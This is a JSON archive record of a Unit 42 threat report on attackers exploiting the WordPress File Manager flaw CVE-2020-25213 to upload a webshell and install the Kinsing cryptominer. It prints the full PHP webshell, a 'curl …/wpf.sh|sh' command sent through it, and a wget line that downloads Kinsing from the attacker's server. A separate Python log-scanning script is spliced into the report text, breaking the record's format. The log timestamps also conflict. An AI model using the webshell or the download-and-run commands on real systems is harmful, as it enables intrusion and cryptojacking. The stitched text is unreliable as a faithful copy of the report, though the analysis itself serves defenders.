{
	"id": "5a9f300d-e6eb-4a02-be54-0b90d309a699",
	"created_at": "2026-04-06T00:18:29.216308Z",
	"updated_at": "2026-04-10T03:34:59.83469Z",
	"deleted_at": null,
	"sha1_hash": "d38dab3c92d8e4950b83cc3dc3277e40107ff911",
	"title": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 53755,
	"plain_text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)\r\nBy Nadav Markus, Efi Barkayev, Gal De Leon\r\nPublished: 2021-02-05 · Archived: 2026-04-05 21:54:59 UTC\r\nExecutive Summary\r\nIn December 2020, Unit 42 researchers observed attempts to exploit CVE-2020-25213, an unauthenticated file upload vulnerability in the WordPress File Manager plugin. Successful exploitation allows an attacker to upload a file with an arbitrary name and extension, leading to remote code execution (RCE) on the targeted web server.\r\nAttackers used this exploit to install webshells, which in turn were used to install Kinsing, malware that runs a malicious cryptominer from the H2miner family. Kinsing is written in Go, and its ultimate purpose is to be used in cryptojacking attacks on container environments.\r\nPalo Alto Networks customers are protected from CVE-2020-25213 and Kinsing with Cortex XDR, AutoFocus and Next-Generation Firewalls with the WildFire security subscription.\r\nCVE-2020-25213 and Webshells\r\nThe vulnerability stems from the fact that the WordPress File Manager plugin renamed the elFinder library's connector.minimal.php.dist file to connector.minimal.php so that it could be executed directly. The file has no access restrictions, so anyone who can reach the web server can execute it, and it exposes elFinder's file upload commands without any authentication. Because this let anyone upload files, attackers began uploading webshells through it, which they then used for further activity such as installing malware or cryptominers.\r\nObserved Attack Chain\r\nOur investigation began with the access log of an attacked machine.
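As an added example, not part of the original Unit 42 report, the following Python script shows how an access log like this one can be triaged for the two artifacts of this attack chain: requests to the plugin's exposed elFinder connector (the upload vector) and requests for PHP files under the plugin's lib/files upload directory, with any cmd parameter URL-decoded so the operator's command becomes readable. The connector path, the upload directory and the cmd parameter are taken from the report; the log lines embedded in the script are constructed (RFC 5737 addresses, combined log format) and are not the victim's log.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Paths taken from the Unit 42 write-up: the exposed elFinder connector that
# accepts unauthenticated uploads (CVE-2020-25213) and the plugin directory
# where uploaded files, including the k.php webshell, end up.
PLUGIN = '/wp-content/plugins/wp-file-manager'
CONNECTOR_SUFFIX = '/wp-file-manager/lib/php/connector.minimal.php'
UPLOAD_DIR_MARKER = '/wp-file-manager/lib/files/'
PHP_EXTENSIONS = ('.php', '.phtml', '.php5', '.php7', '.phar')

# Pull method, URL and status out of a combined-format line without depending
# on the rest of the format (virtual-host prefixes, extra fields, etc.).
REQUEST_RE = re.compile(r'(GET|POST|PUT|HEAD|OPTIONS|DELETE) ([^ ]+) HTTP/[0-9.]+')
STATUS_RE = re.compile(r' HTTP/[0-9.]+[^ ]* ([0-9]{3}) ')


def parse_line(line):
    '''Return (method, path, query, status) for one log line, or None.'''
    m = REQUEST_RE.search(line)
    if not m:
        return None
    method, url = m.group(1), m.group(2)
    parts = urlsplit(url)
    s = STATUS_RE.search(line)
    status = int(s.group(1)) if s else None
    return method, parts.path, parts.query, status


def classify(line):
    '''Map one access-log line to a finding dict, or None if it looks benign.'''
    parsed = parse_line(line)
    if parsed is None:
        return None
    method, path, query, status = parsed
    if path.endswith(CONNECTOR_SUFFIX):
        # The connector should not be reachable at all, so any hit is worth a
        # look; a POST is the shape an upload takes.
        return {'severity': 'high' if method == 'POST' else 'medium',
                'rule': 'exposed elFinder connector reached (CVE-2020-25213 upload vector)',
                'method': method, 'path': path, 'status': status, 'cmd': None}
    if UPLOAD_DIR_MARKER in path and path.lower().endswith(PHP_EXTENSIONS):
        # parse_qs URL-decodes for us: + becomes a space and %7C becomes |
        cmd = parse_qs(query).get('cmd', [None])[0]
        return {'severity': 'critical' if cmd else 'high',
                'rule': 'PHP executed from plugin upload directory (webshell?)',
                'method': method, 'path': path, 'status': status, 'cmd': cmd}
    return None


def scan(lines):
    '''Return findings for every suspicious line, in log order.'''
    return [f for f in (classify(line) for line in lines) if f is not None]


# Constructed sample log. Q holds the double-quote character so the lines can
# be assembled without any quote characters appearing in this listing.
Q = chr(34)
UA = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
      '(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36')


def log_line(ip, ts, method, url, status, size):
    '''Build one constructed combined-format access-log line.'''
    return (f'{ip} - - [{ts} +0000] {Q}{method} {url} HTTP/1.1{Q} '
            f'{status} {size} {Q}-{Q} {Q}{UA}{Q}')


SAMPLE_LOG = [
    # benign traffic
    log_line('203.0.113.7', '19/Dec/2020:08:57:01', 'GET', '/wp-login.php', 200, 5120),
    log_line('203.0.113.7', '19/Dec/2020:08:57:20', 'GET', PLUGIN + '/lib/files/notes.txt', 404, 0),
    # modelled on the attack chain in the report: an upload through the
    # connector, then a command handed to the uploaded k.php webshell
    log_line('198.51.100.23', '19/Dec/2020:08:57:30', 'POST',
             PLUGIN + '/lib/php/connector.minimal.php', 200, 1453),
    log_line('198.51.100.23', '19/Dec/2020:08:57:48', 'GET',
             PLUGIN + '/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh', 200, 411),
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f['severity'].upper(), f['rule'], f['method'], f['path'], f['status'], f['cmd'])
```

Run against a real log, feed the file's lines to scan(); anything the connector rule reports deserves a check of the plugin's lib/files directory for PHP that should not be there, and a decoded cmd value tells you what the operator ran next.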
What caught our attention was the following HTTP POST request to the web server:\r\n[19/Dec/2020:08:58:08 +0000] \"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\" 200 1453 \"-\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\"\r\nThis request was used to upload a webshell. Inspecting the log further, we found the webshell being invoked:\r\n[19/Dec/2020:08:57:48 +0000] \"GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1\" 200 411\r\nhttps://unit42.paloaltonetworks.com/cve-2020-25213/\r\nPage 1 of 3\n\nAs we can see from the above, the webshell was named k.php and was passed a command to execute through the cmd parameter. The webshell itself is simple: it is stored in plain text on the web server and contains no obfuscation or authentication measures, so anyone who knows its path can run commands as the web server user:\r\n\u003c?php if(isset($_REQUEST['cmd'])){ echo \"\u003cpre\u003e\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"\u003c/pre\u003e\"; die; }?\u003e\r\nURL-decoding the HTTP GET request issued to k.php gives the command curl X.X.X.X/wpf.sh|sh: it invoked curl, downloaded a file named wpf.sh and piped it straight into a shell.\r\nWe obtained the shell script from the attacker’s command and control (C2) server. Here is an excerpt of the file:\r\n...\r\n$WGET $DIR/kinsing http://X.X.X.X/kinsing\r\nchmod +x $DIR/kinsing\r\n…\r\nSKL=wpf $DIR/kinsing\r\n…\r\nThe file wpf.sh is a script that downloads Kinsing using wget, gives it execute permissions and proceeds to execute it.\r\nConclusion\r\nWe observed an exploit in the wild for the WordPress File Manager RCE vulnerability CVE-2020-25213. Attackers used the exploit to install webshells, which in turn were used to install Kinsing, which runs a malicious cryptominer from the H2miner family. 
The ultimate purpose of Kinsing is to be used in cryptojacking attacks on container environments.\r\nPalo Alto Networks customers are protected from CVE-2020-25213 in the following ways:\r\nThe Linux Cortex XDR agent blocks this attack. The webshell is detected by the local threat evaluation engine, which is powered by machine learning algorithms.\r\nThe malware has malicious verdicts in WildFire, a security subscription for the Next-Generation Firewall.\r\nThe Cortex XDR Behavioral Threat Protection engine prevents both Kinsing and the payload cryptominer.\r\nPalo Alto Networks Threat Prevention covers this vulnerability with TID 59286.\r\nAutoFocus has an appropriate tag for the miner and Kinsing.\r\nIndicators of Compromise\r\nKinsing Hashes (SHA256)\r\n6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b\r\n5f1e0e3cc38f7888b89a9adddb745a341c5f65165dadc311ca389789cc9c6889\r\nCryptominer Hash (H2miner, SHA256)\r\ndd603db3e2c0800d5eaa262b6b8553c68deaa486b545d4965df5dc43217cc839\r\nShell Script Hash (SHA256)\r\na68ab806c8e111e98ba46d5bfdabd9091a68839dd39dfe81e887361bd4994a62\r\nWebshell Hash (SHA256)\r\nf1c5bed9560a1afe9d5575e923e480e7e8030e10bc3d7c0d842b1a64f49f8794\r\nSource: https://unit42.paloaltonetworks.com/cve-2020-25213/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cve-2020-25213/"
	],
	"report_names": [
		"cve-2020-25213"
	],
	"threat_actors": [
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434709,
	"ts_updated_at": 1775792099,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d38dab3c92d8e4950b83cc3dc3277e40107ff911.pdf",
		"text": "https://archive.orkl.eu/d38dab3c92d8e4950b83cc3dc3277e40107ff911.txt",
		"img": "https://archive.orkl.eu/d38dab3c92d8e4950b83cc3dc3277e40107ff911.jpg"
	}
}